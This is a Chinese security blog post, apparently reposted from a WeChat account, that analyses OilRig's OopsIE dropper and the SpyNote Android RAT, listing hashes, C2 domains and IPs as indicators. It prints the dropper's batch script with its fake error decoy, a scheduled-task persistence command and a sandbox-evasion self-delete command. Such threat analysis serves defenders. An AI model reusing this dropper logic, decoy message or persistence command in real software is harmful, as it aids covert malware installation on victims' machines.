伊朗APT组织Oilrig-OopsIE恶意软件和SpyNote移动恶意软件

释放双眼,带上耳机,听听看~!

Oilrig OopsIE malware and SpyNote mobile malware

OopsIE dropper

MD5fe466788a06fc5646bd52fe6732d59bf

SHA-1b774c171b76c49be5b5efa9374c7d40f5000e184

Authentihash824b3bbc2604bd638b42d665c118ec687c7657bff4ff9b348b35036a42a3729d

 

Fake failure message:

 

C:\Users\admin\AppData\Local\Temp\ztmp\t23092.bat

@echo off

set ztmp=C:\Users\admin\AppData\Local\Temp\ztmp

set MYFILES=C:\Users\admin\AppData\Local\Temp\afolder

set bfcec=t23141.exe

attrib +h C:\Users\admin\AppData\Local\Temp\ztmp

@echo off

 

reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5” /v version

if %errorlevel% equ 0 goto v3

 

reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full” /v version

if %errorlevel% equ 0 goto v4

 

goto commonexit

 

:v3

copy %MYFILES%\WinSyncMetastoreV2.exe C:\programdata\WinSyncMetastoreV2.exe

C:\programdata\WinSyncMetastoreV2.exe

goto commonexit

 

:v4

copy %MYFILES%\WinSyncMetastoreV4.exe C:\programdata\WinSyncMetastoreV4.exe

C:\programdata\WinSyncMetastoreV4.exe

goto commonexit

 

:commonexit

start “” /wait cmd /c “echo An error occurred during initialization of VpnSrv.dll in 00×41542178!&echo(&pause”

exit

 

 

 

Installation

 

 

Drops

OopsIE malware  WinSyncMetastore.exe

 (https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/)


WinSyncMetastoreV2.exe

MD55998ef679682878e68d5ac4a1733fac5

SHA-25636e66597a3ff808acf9b3ed9bc93a33a027678b1e262707682a2fd1de7731e23

 

WinSyncMetastoreV4.exe

MD5d41207d54b69fb3eeb7a104f7d36c7b0

SHA-256055b7607848777634b2b17a5c51da7949829ff88084c3cb30bcb3e58aae5d8e9

 

Persistency

cmd.exe /c SchTasks /Create /SC MINUTE /MO 3 /TN “MicrosoftPrintDrive” /TR “wscript C:\ProgramData\WinSyncMetastore.vbs” /f

 

C2:

defender-update.com

 

Samples will run these commands if they detect a sandbox:

cmd.exe /C choice /C Y /N /D Y /T 2 & Del C:\Users\admin\Desktop\sampale.exe

SpyNote android malware

213.227.140.35, the IP address of defender-update\.com, has also served as the command and control server for SpyNote, an off-the-shelf mobile rat.

 

client.apk

MD52820c84cf9f34fe999da0bcedea6915d

SHA-10f3ae5c85151686b836fd95e2d680201679101e9

SHA-2569727b56953bb6622cc1d3a039e2ebf6ef260dd76c8dcc11f4a1320fbf294621d

 

102.apk

MD527aaf0e49ebc240933ea5d1a04747977

SHA-1c7e7ad6d763a41b8d3d7d9301acbe53674041d75

SHA-256

d7bebfd87066e34d2f68ddf39d5637afa978df72bceb8dc690ed1553cdfffa43

IOCs

defender-update.com

windowspatch.com

herkhabar.com

89.248.173.131

213.227.140.35:3210

178.32.211.5

Windows Implantment Module.exe

d41207d54b69fb3eeb7a104f7d36c7b0

ea6321f55ea83e6f2887a2360f8e55b0

3cf8aff7c56cf477bde9adbd543abc40

fe466788a06fc5646bd52fe6732d59bf

27aaf0e49ebc240933ea5d1a04747977

5998ef679682878e68d5ac4a1733fac5

2820c84cf9f34fe999da0bcedea6915d

 

本文源自微信公众号:黑鸟

人已赞赏
安全工具

十大干货安全议题,足以展望今年网络安全趋势

2019-10-16 10:41:52

安全工具

CVE-2018-4993漏洞正在用于攻击+资源

2019-10-16 10:42:08

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索